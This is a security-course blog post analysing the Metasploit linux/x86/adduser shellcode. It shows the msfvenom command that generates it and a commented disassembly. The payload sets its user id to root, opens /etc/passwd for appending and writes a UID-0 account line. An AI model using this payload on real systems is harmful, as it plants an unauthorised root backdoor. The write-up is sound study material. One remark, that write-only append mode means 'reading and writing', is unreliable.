SLAE Problem 5.2: Msfvenom Analysis of linux/x86/adduser

January 3, 2017 - 6 minute read -
asm shellcode msfvenom

This blog post has been created for completing the requirements for the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-824


  • Choose at least 3 shellcode samples created using Msfvenom for linux/x86
  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis

Source code for this assignment can be found here


The next shellcode I would like to look at is linux/x86/adduser. My prediction for this shellcode is that it essentially just runs execve with /usr/sbin/adduser and the arguments that it would require. Lets analyze the assembly to find out!


msfvenom --payload linux/x86/adduser --payload-options

We see:

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
PASS   metasploit       yes       The password for this user
SHELL  /bin/sh          no        The shell for this user
USER   metasploit       yes       The username to create

The username and password both default to metasploit and the shell the user will be assigned will be /bin/sh. We will most likely find these values as arguments to execve if our prediction is correct. Lets export the shellcode:

Running msfvenom --payload linux/x86/adduser R > adduser.bin we create our shellcode to analyze. Using ndisasm -u adduser.bin we get the following assembly for analysis:

/linux/x86/adduser Shellcode ASM

;; 0x46       = 70
;; syscall 70 = sys_setreuid
;; man 2 setreuid looks like the following
;; int setreuid(uid_t ruid, uid_t euid);
xor ecx,ecx
mov ebx,ecx
push byte +0x46
pop eax
int 0x80

As illustrated in the comments, the above chunk of assembly sets the real and effective user id of of the process to be 0 which elevates the privileges.

;; 0x5       = 5
;; syscall 5 = sys_open
push byte +0x5
pop eax

;; Clear out ecx
xor ecx,ecx
;; Push 0x00000000
;; This will null terminate our string
push ecx

;; Build up a file as a string to open
push dword 0x64777373 ;; ‘dwss’
push dword 0x61702f2f ;; ‘ap//‘
push dword 0x6374652f ;; ‘cte/‘

;; Move a pointer to our file to open into ebx
mov ebx,esp

;; Increment ecx to 0x00000001
inc ecx

;; And move 0x4 into the high byte of cx
;; making cx 0x0401 as the flags passed to the open call
mov ch,0x4
int 0x80

The next chunk of assembly calls open. This opens the /etc/passwd file with the flags of 0x0401. What does 0x0401 stand for? Well, looking in /usr/include/asm-generic/fcntl.h we see:

define O_WRONLY        00000001
.. snip ..
define O_APPEND        00002000

The values specified in this header file are defined in octal. Our assembly is using hex so we do a bit of conversion using gdb:

gdb --batch --ex "print /o 0x0401"

This tells us that our hex value actually equals 02001 in octal of which doing 00000001 | 00002000 = 00002001 or O_WRONLY | O_APPEND. This indicates that we have opened the file for reading and writing and in append mode. This will ensure that the cursor is placed at the end of the file.

The next chunk of code gets interesting. We need the memory offsets to help us a bit:

00000025  93                xchg eax,ebx
00000026  E828000000        call dword 0x53
0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80

The xchg is our usual saving of the file descriptor returned in eax. We then see a call dword 0x53 and then things start to get messy. We know about the jump call pop technique from our SLAE course, maybe this call is leveraging the fact that the next address will be popped on the stack. Looking at the offsets in our disassembly and checking out the bytes from 0x53 on, we see 59 8B 51 fC 6A 04 58 CD 80. Leveraging this wonderful online we learn what those bytes represent:

0:  59                      pop    ecx
1:  8b 51 fc                mov    edx,DWORD PTR [ecx-0x4]
4:  6a 04                   push   0x4
6:  58                      pop    eax
7:  cd 80                   int    0x80

Sure enough the address of the next instruction that was placed on the stack from our call instruction is popped into ecx. An offset from that value is placed in edx which we will need to investigate a bit and then the 0x4 system call. Looking in /usr/include/i386-linux-gnu/asm/unistd_32.h we see that this is #define __NR_write 4.

This makes sense. We just opened the /etc/passwd file and now we want to add stuff to it. The write syscall signature looks like:

ssize_t write(int fd, const void *buf, size_t count)

This means edx is the length of what is being written, ecx is the string we want to write, ebx is the file descriptor to /etc/passwd and eax is our write sys call number. So what would that offset from ecx equate to? Zooming in on those bytes:

00000026  E828000000        call dword 0x53
0000002B  6D <--- ecx is pointing here

Moving backward 4 bytes from the 0x6D puts us at 0x28. This is the value that is being used as the length of the buffer in the write syscall.

Converting 0x28 to decimal using gdb:

gdb --batch --ex "print /d 0x28"
$1 = 40

We see that 40 bytes is going to be written. Using GDB again: Note: 0x2B is the beginning of the gibberish, 0x28 is the 40 bytes we just calculated.

gdb --batch --ex "print /x 0x2B + 0x28"
$1 = 0x53

We see that 0x53 is 40 bytes after our call instruction and is exactly the byte that was referenced in the call command:

00000026  E828000000 call dword 0x53

Ok… Lets checkout the bytes of that gibberish and see what they might translate to as ascii:


Converted to ascii outputs:


Ok. That makes sense. This is the line that will be appended to the /etc/passwd file in the format that linux would expect, e.g username:passwd:UID:GID:full_name:directory:shell. The user, shell, and presumably password all match up with the configuration that the payload defaults to.

push byte +0x1
pop eax
int 0x80

Finally we call exit to exit gracefully. So it turns out that my prediction was completely inaccurate. Execve was not used to execute the adduser command.
